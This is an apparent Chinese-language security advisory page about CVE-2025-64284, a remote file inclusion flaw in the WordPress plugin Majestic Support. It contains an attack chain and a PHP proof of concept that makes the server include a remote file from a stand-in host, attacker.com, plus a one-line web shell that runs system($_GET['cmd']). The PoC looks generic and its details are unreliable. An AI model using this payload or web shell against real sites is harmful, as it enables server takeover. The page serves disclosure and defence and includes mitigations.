IPBUF安全漏洞报告
English
CVE-2025-64284 CVSS 7.5 高危

CVE-2025-64284 Majestic Support远程文件包含漏洞

披露日期: 2025-10-29

漏洞信息

漏洞编号
CVE-2025-64284
漏洞类型
远程文件包含(RFI)
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Majestic Support majestic-support WordPress插件

相关标签

CVE-2025-64284远程文件包含RFIWordPress插件漏洞Majestic SupportPHP漏洞远程代码执行高危漏洞PatchstackCVSS 7.5

漏洞概述

CVE-2025-64284是WordPress插件Majestic Support中发现的一个高危远程文件包含漏洞。该漏洞源于PHP程序中include/require语句对文件名控制不当,允许攻击者通过构造恶意请求包含远程文件。CVSS评分7.5,属于高危级别漏洞。攻击者可在低权限情况下通过网络远程利用此漏洞,无需用户交互即可实现攻击。成功利用可导致远程代码执行,严重威胁网站安全。Majestic Support插件在1.0.7及以下版本均受影响。该漏洞由Patchstack安全团队发现并报告,建议受影响的用户立即采取修复措施。

技术细节

该漏洞是经典的PHP远程文件包含(RFI)问题。在Majestic Support插件中存在通过URL参数可控的文件包含逻辑。攻击者可以通过构造类似?file=http://attacker.com/malicious.txt的请求,强制服务器包含远程托管的恶意PHP文件。由于PHP的include/require语句会执行被包含文件中的PHP代码,攻击者可以实现远程代码执行。漏洞利用条件包括:1) PHP配置中allow_url_include未禁用;2) 攻击者可访问存在漏洞的URL端点;3) 攻击者需拥有WordPress站点的基本访问权限(订阅者角色即可)。利用成功后可完全控制服务器,执行任意系统命令、读取敏感配置文件、植入后门等。

攻击链分析

STEP 1
步骤1
攻击者识别运行Majestic Support插件(<=1.0.7)的WordPress站点
STEP 2
步骤2
攻击者在自有服务器上托管恶意PHP文件(malicious.txt)
STEP 3
步骤3
攻击者构造包含file参数的AJAX请求,指向远程恶意文件
STEP 4
步骤4
服务器执行include/require语句,远程文件被加载并执行
STEP 5
步骤5
恶意代码在服务器端以Web服务权限执行,实现RCE或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<?php // CVE-2025-64284 PoC - Remote File Inclusion in Majestic Support // Target: WordPress Majestic Support Plugin <= 1.0.7 $target = "http://target-site.com/wp-admin/admin-ajax.php"; $attacker_server = "http://attacker.com/"; // Malicious file to be included (malicious.txt on attacker server) $malicious_file = $attacker_server . "malicious.txt"; // Build the exploit payload $data = array( 'action' => 'majestic_support_file_include', 'file' => $malicious_file ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $response = curl_exec($ch); echo "Response: " . $response; curl_close($ch); // Contents of malicious.txt (on attacker server): // <?php system($_GET['cmd']); phpinfo(); ?> ?>

影响范围

Majestic Support <= 1.0.7

防御指南

临时缓解措施
立即临时缓解措施:1) 在Web服务器配置中添加规则,拦截包含file、path等参数的异常请求;2) 修改.htaccess限制AJAX端点的访问权限;3) 临时禁用Majestic Support插件直到完成升级;4) 检查服务器access日志,排查是否存在可疑的文件包含请求;5) 考虑部署临时IP黑名单阻止已知攻击源。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表